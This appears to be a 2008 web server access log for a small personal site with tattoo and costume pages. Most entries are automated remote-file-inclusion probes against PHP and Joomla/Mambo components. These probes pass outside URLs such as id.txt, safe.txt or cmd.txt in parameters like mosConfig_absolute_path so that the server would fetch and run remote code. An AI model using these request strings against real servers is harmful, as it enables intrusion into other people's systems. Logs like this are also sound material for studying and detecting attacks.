62.65.159.210 - - [24/Aug/2008:05:07:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
62.65.159.210 - - [24/Aug/2008:05:07:45 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
202.228.204.130 - - [24/Aug/2008:05:08:34 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:05:08:34 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.185.237.191 - - [24/Aug/2008:05:10:40 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:05:10:40 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
86.58.154.237 - - [24/Aug/2008:05:13:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:05:13:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
202.228.204.130 - - [24/Aug/2008:05:13:42 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:05:13:42 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:05:13:42 -0500] "GET //?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:05:13:42 -0500] "GET //?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:05:14:22 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:05:14:23 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
213.248.62.98 - - [24/Aug/2008:05:17:04 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
213.248.62.98 - - [24/Aug/2008:05:17:04 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
72.52.244.232 - - [24/Aug/2008:05:18:27 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:05:18:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:05:18:28 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:05:18:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:05:18:43 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:05:18:44 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:05:18:57 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:05:18:57 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
200.204.36.7 - - [24/Aug/2008:05:22:12 -0500] "GET /logs/access_log.1211500800/index1.php?page=http://websnap.ru//wp-content/uploads/id2.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
200.204.36.7 - - [24/Aug/2008:05:22:12 -0500] "GET /index1.php?page=http://websnap.ru//wp-content/uploads/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
200.204.36.7 - - [24/Aug/2008:05:22:13 -0500] "GET /logs/index1.php?page=http://websnap.ru//wp-content/uploads/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
69.10.154.65 - - [24/Aug/2008:05:24:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:05:24:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
74.6.8.121 - - [24/Aug/2008:05:24:25 -0500] "GET /logs/access_log.1211846400 HTTP/1.0" 200 279713 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.93.62.114 - - [24/Aug/2008:05:27:18 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:05:27:19 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.221.130.3 - - [24/Aug/2008:05:30:46 -0500] "GET /logs/index1.php?page=http://websnap.ru//wp-content/uploads/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:05:30:47 -0500] "GET /index1.php?page=http://websnap.ru//wp-content/uploads/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
80.93.62.114 - - [24/Aug/2008:05:31:10 -0500] "GET /logs/access_log.1203724800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:05:31:11 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:05:31:11 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:05:31:55 -0500] "GET /logs/access_log.1209600000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:05:36:48 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:05:36:48 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.214.44.28 - - [24/Aug/2008:05:37:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [24/Aug/2008:05:37:20 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
62.238.171.160 - - [24/Aug/2008:05:38:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.nl/search?hl=nl&q=vintage+flash&btnG=Zoeken&meta=""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
62.238.171.160 - - [24/Aug/2008:05:38:17 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
62.238.171.160 - - [24/Aug/2008:05:38:18 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
62.238.171.160 - - [24/Aug/2008:05:38:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
62.238.171.160 - - [24/Aug/2008:05:38:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
64.185.237.191 - - [24/Aug/2008:05:40:33 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:05:40:33 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
131.107.65.41 - - [24/Aug/2008:05:40:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""MSR-ISRCCrawler"
131.107.65.41 - - [24/Aug/2008:05:40:39 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""MSR-ISRCCrawler"
65.18.170.161 - - [24/Aug/2008:05:41:04 -0500] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS//r8? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
65.55.208.121 - - [24/Aug/2008:05:42:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [24/Aug/2008:05:42:22 -0500] "GET /logs/access_log.1181260800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.23.172 - - [24/Aug/2008:05:42:41 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.45 - - [24/Aug/2008:05:42:41 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [24/Aug/2008:05:43:48 -0500] "GET /logs/access_log.1211932800 HTTP/1.0" 200 393520 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.105.140.67 - - [24/Aug/2008:05:45:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=vintage+flash&spell=1""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
88.105.140.67 - - [24/Aug/2008:05:45:31 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
88.105.140.67 - - [24/Aug/2008:05:45:31 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
88.105.140.67 - - [24/Aug/2008:05:45:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.6.8.121 - - [24/Aug/2008:05:58:54 -0500] "GET /logs/access_log.1195344000 HTTP/1.0" 200 172481 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.19.90.90 - - [24/Aug/2008:06:00:16 -0500] "GET /logs//atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:06:00:18 -0500] "GET //atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
209.217.116.153 - - [24/Aug/2008:06:00:20 -0500] "GET /logs//atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:00:21 -0500] "GET //atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.116.103.35 - - [24/Aug/2008:06:01:20 -0500] "GET /index.php?AML_opensite=http://www.wichtl.at/files/echo? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
77.221.130.3 - - [24/Aug/2008:06:04:07 -0500] "GET /logs/access_log.1211500800/index1.php?page=http://websnap.ru//wp-content/uploads/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
209.217.116.153 - - [24/Aug/2008:06:04:37 -0500] "GET /logs//atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:04:38 -0500] "GET //atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
190.137.181.149 - - [24/Aug/2008:06:04:47 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
190.137.181.149 - - [24/Aug/2008:06:04:47 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
190.137.181.149 - - [24/Aug/2008:06:06:15 -0500] "GET /logs/access_log.1214524800//phpsecurityadmin/include/logout.php?PSA_PATH=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
88.191.62.117 - - [24/Aug/2008:06:09:38 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://alboz.l4rge.com/pw.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
88.191.62.117 - - [24/Aug/2008:06:09:38 -0500] "GET //?path%5Bdocroot%5D=http://alboz.l4rge.com/pw.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
88.191.62.117 - - [24/Aug/2008:06:09:39 -0500] "GET /logs//?path%5Bdocroot%5D=http://alboz.l4rge.com/pw.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
193.239.188.99 - - [24/Aug/2008:06:14:10 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://customsbroker.ru//linki/files/contrM.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
193.239.188.99 - - [24/Aug/2008:06:14:10 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://customsbroker.ru//linki/files/contrM.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
70.84.106.68 - - [24/Aug/2008:06:14:22 -0500] "GET //index3.php?option=com_gallery=§ionid=&id=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
190.137.181.149 - - [24/Aug/2008:06:14:56 -0500] "GET /logs/phphtml.php?htmlclass_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.195.37.156 - - [24/Aug/2008:06:14:57 -0500] "GET /costume/thmb9.htm HTTP/1.0" 200 2155 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.156 - - [24/Aug/2008:06:15:08 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 2921 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.84.106.68 - - [24/Aug/2008:06:15:10 -0500] "GET //index.php?option=com_gallery=§ionid=&id=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.18.204.110 - - [24/Aug/2008:06:15:12 -0500] "GET /logs/forum.php?sourcedir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
66.18.204.110 - - [24/Aug/2008:06:15:13 -0500] "GET /forum.php?sourcedir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
88.191.62.117 - - [24/Aug/2008:06:15:28 -0500] "GET /logs//?path%5Bdocroot%5D=http://alboz.l4rge.com/pw.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
88.191.62.117 - - [24/Aug/2008:06:15:28 -0500] "GET //?path%5Bdocroot%5D=http://alboz.l4rge.com/pw.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
85.126.175.146 - - [24/Aug/2008:06:16:12 -0500] "GET //index3.php?option=com_gallery=§ionid=&id=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
65.55.208.137 - - [24/Aug/2008:06:16:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [24/Aug/2008:06:16:59 -0500] "GET /logs/access_log.1216944000 HTTP/1.1" 200 657949 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.126.175.146 - - [24/Aug/2008:06:17:45 -0500] "GET //index.php?option=com_gallery=§ionid=&id=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
205.134.252.10 - - [24/Aug/2008:06:18:17 -0500] "GET //index3.php?option=com_gallery=§ionid=&id=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
205.134.252.10 - - [24/Aug/2008:06:18:26 -0500] "GET //index.php?option=com_gallery=§ionid=&id=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
65.55.232.12 - - [24/Aug/2008:06:20:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.232.12 - - [24/Aug/2008:06:20:53 -0500] "GET /tattoo/set3.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.19.90.90 - - [24/Aug/2008:06:24:02 -0500] "GET /logs/access_log.1214524800//atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:06:24:03 -0500] "GET //atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:06:24:03 -0500] "GET /logs//atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:06:25:22 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
195.56.111.194 - - [24/Aug/2008:06:25:44 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
195.56.111.194 - - [24/Aug/2008:06:25:44 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
195.56.111.194 - - [24/Aug/2008:06:26:07 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
195.56.111.194 - - [24/Aug/2008:06:26:07 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
69.93.234.108 - - [24/Aug/2008:06:26:25 -0500] "GET /signin.php?sent=1&AMG_serverpath=http://www.wichtl.at/files/echo? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
193.218.160.36 - - [24/Aug/2008:06:26:43 -0500] "GET /logs//?page=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.813"
193.218.160.36 - - [24/Aug/2008:06:26:44 -0500] "GET //?page=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.813"
72.52.244.232 - - [24/Aug/2008:06:27:22 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:06:27:22 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
201.130.79.132 - - [24/Aug/2008:06:27:31 -0500] "GET /logs//naboard_pnr.php?skin=http://alan-stone.com/images/stories/cmd.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
201.130.79.132 - - [24/Aug/2008:06:27:31 -0500] "GET //naboard_pnr.php?skin=http://alan-stone.com/images/stories/cmd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.52.244.232 - - [24/Aug/2008:06:27:48 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:06:27:48 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
213.248.62.98 - - [24/Aug/2008:06:28:57 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
213.248.62.98 - - [24/Aug/2008:06:28:57 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
86.58.154.237 - - [24/Aug/2008:06:29:46 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:06:29:47 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:06:30:28 -0500] "GET /logs/access_log.1214179200/components/com_performs/performs.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:06:30:28 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:06:30:28 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:31:27 -0500] "GET /logs/access_log.1214524800//atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:31:28 -0500] "GET //atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:31:29 -0500] "GET /logs//atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:34:07 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://www.marioni.info/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
69.10.154.65 - - [24/Aug/2008:06:34:30 -0500] "GET /logs/access_log.1214179200/components/com_performs/performs.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:06:34:30 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:06:34:30 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
217.172.186.250 - - [24/Aug/2008:06:34:33 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:06:34:33 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
74.200.219.169 - - [24/Aug/2008:06:36:14 -0500] "GET /logs/access_log.1209600000//include.php?path[docroot]=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 323 "-""libwww-perl/5.814"
74.200.219.169 - - [24/Aug/2008:06:36:14 -0500] "GET //include.php?path[docroot]=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 296 "-""libwww-perl/5.814"
74.200.219.169 - - [24/Aug/2008:06:36:14 -0500] "GET /logs//include.php?path[docroot]=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 301 "-""libwww-perl/5.814"
